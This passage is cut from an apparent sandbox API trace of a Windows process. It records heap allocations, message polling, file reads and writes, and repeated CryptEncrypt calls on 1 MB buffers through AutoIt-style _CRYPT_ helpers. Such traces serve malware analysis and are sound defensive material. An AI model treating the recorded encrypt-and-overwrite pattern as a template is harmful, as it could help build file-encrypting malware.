hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0118.784] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.786] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.786] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0118.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0118.787] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.787] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.787] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.820] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x100000) returned 1 [0118.820] CharLowerBuffW (in: lpsz="byte[1048577]", cchLength=0xd | out: lpsz="byte[1048577]") returned 0xd [0118.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.908] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5310020*, pdwDataLen=0x144e790*=0x100000, dwBufLen=0x100000 | out: pbData=0x5310020*, pdwDataLen=0x144e790*=0x100000) returned 1 [0119.063] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0119.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0119.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.222] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0119.222] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0119.222] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0119.223] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0119.223] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0119.223] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0119.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x50fb020 [0119.241] WriteFile (in: hFile=0x2a0, lpBuffer=0x50fb020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x50fb020*, lpNumberOfBytesWritten=0x144f194*=0x100000, lpOverlapped=0x0) returned 1 [0119.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x50fb020 | out: hHeap=0x1780000) returned 1 [0119.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0119.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0119.320] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0119.320] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0119.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0119.320] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0119.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0119.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0119.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0119.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0119.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0119.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0119.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0119.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0119.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0119.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0119.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0119.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0119.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x50f3020 [0119.323] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0119.334] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0xec00, lpOverlapped=0x0) returned 1 [0119.335] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0119.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0119.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0119.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0119.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1ec00) returned 0x4516010 [0119.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x50f3020 | out: hHeap=0x1780000) returned 1 [0119.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0119.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0119.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0119.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0119.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1ec00) returned 0x499a008 [0119.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0119.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.346] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0119.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0119.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0119.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0119.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0119.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1ec00) returned 0x4516010 [0119.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0119.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0119.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0119.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0119.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0119.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0119.347] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0119.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0119.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0119.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0119.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0119.488] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0119.488] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0119.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392148 | out: hHeap=0x1780000) returned 1 [0119.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0119.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1ec00) returned 0x4516010 [0119.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27f0 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0119.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0119.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0119.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1ec00) returned 0x49b8c10 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0119.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0119.491] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0119.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0119.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0119.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0119.492] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 